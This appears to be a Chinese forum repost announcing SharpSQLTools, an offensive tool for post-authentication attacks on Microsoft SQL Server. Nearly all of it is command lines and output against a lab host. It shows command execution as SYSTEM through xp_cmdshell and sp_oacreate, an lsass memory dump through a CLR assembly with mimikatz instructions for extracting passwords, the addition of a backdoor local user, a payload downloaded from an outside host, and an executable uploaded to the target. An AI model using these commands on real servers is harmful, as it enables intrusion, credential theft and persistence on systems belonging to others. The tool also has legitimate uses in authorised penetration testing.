SharpSQLTools-上传下载文件，xp_cmdshell与sp_oacreate双回显和clr...

gclome

原文链接：SharpSQLTools-上传下载文件，xp_cmdshell与sp_oacreate双回显和clr加载程序集

1. 简介
   
2. 
   
3. 和RcoIl一起写的小工具，可上传下载文件，xpcmdshell与spoacreate双回显和clr加载程序集执行相应操作。功能参考mssqlproxy，由于目前C#还不知如何获取SQL连接的socket，该项目中的mssqlproxy功能目前尚未实现。另外，Clr不适用于一些与线程进程相关的操作。
   
4. 编译环境为net 4.0
   
5. 吹一波RcoIl ，关注RcoIl跟着大佬学C#！！！
   
6. http://github.com/rcoIl
   
7. Usage

复制代码

1. >SharpSQLTools.exe
   
2. 
   
3.    _____ _                      _____  ____  _   _______          _
   
4.   / ____| |                    / ____|/ __ \| | |__   __|        | |
   
5. | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___
   
6.   \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
   
7.   ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
   
8. |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
   
9.                          | |
   
10.                          |_|
    
11.                                                     by Rcoil & Uknow
    
12. 
    
13. Usage:
    
14. 
    
15. SharpSQLTools target username password                   - interactive console
    
16. SharpSQLTools target username password module command    - non-interactive console
    
17. 
    
18. Module:
    
19. 
    
20. enable_xp_cmdshell         - you know what it means
    
21. disable_xp_cmdshell        - you know what it means
    
22. xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    
23. sp_oacreate {cmd}          - executes cmd using sp_oacreate
    
24. enable_ole                 - you know what it means
    
25. disable_ole                - you know what it means
    
26. upload {local} {remote}    - upload a local file to a remote path (OLE required)
    
27. download {remote} {local}  - download a remote file to a local path
    
28. enable_clr                 - you know what it means
    
29. disable_clr                - you know what it means
    
30. install_clr                - create assembly and procedure
    
31. uninstall_clr              - drop clr
    
32. clr_dumplsass              - dumplsass by clr
    
33. clr_adduser {user} {pass}  - add user by clr
    
34. clr_download {url} {path}  - download file from url by clr
    
35. exit                       - terminates the server process (and this session)

复制代码

功能介绍

支持交互模式与非交互模式，交互模式直接跟目标，用户名和密码即可。非交互模式直接跟模块与命令。

1. SharpSQLTools target username password                   - interactive console
   
2. SharpSQLTools target username password module command    - non-interactive console

复制代码

xp_cmdshell执行命令

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami
   
2. [*] Database connection is successful!
   
3. 
   
4. nt authority\system

复制代码

sp_oacreate执行命令

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami
   
2. [*] Database connection is successful!
   
3. [+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt
   
4. [+] Reading C:\Users\Public\Downloads\1611131759069.txt
   
5. 
   
6. nt authority\system
   
7. 
   
8. [+] Deleting C:\Users\Public\Downloads\1611131759069.txt

复制代码

clr_dumplsass

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass
   
2. [*] Database connection is successful!
   
3. 
   
4. [*] Dumping lsass (488) to C:\Windows\Temp\debug488.out
   
5. [+] Dump successful!
   
6. 
   
7. [*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file
   
8. [X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing
   
9. [*] Deleting C:\Windows\Temp\debug488.out
   
10. 
    
11. [+] Dumping completed. Rename file to "debug488.gz" to decompress.
    
12. 
    
13. [*] Operating System : Windows Server 2008 R2 Standard
    
14. [*] Architecture     : AMD64
    
15. [*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

复制代码

clr_adduser

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX
   
2. [*] Database connection is successful!
   
3. [*] Adding User success
   
4. [*] Adding Group Member success

复制代码

clr_download

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"
   
2. [*] Database connection is successful!
   
3. [*] Download success

复制代码

upload

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe
   
2. [*] Database connection is successful!
   
3. [*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...
   
4. [+] 7-1 Upload completed
   
5. [+] 7-2 Upload completed
   
6. [+] 7-3 Upload completed
   
7. [+] 7-4 Upload completed
   
8. [+] 7-5 Upload completed
   
9. [+] 7-6 Upload completed
   
10. [+] 7-7 Upload completed
    
11. [+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe
    
12. [+] del c:\Users\Public\Downloads\*.config_txt
    
13. [*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed

复制代码

download

1. λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt
   
2. [*] Database connection is successful!
   
3. [*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...
   
4. [*] 'c:\Users\Public\Downloads\t.txt' Download completed

复制代码

Github

https://github.com/uknowsec/SharpSQLTools

References

https://github.com/blackarrowsec/mssqlproxy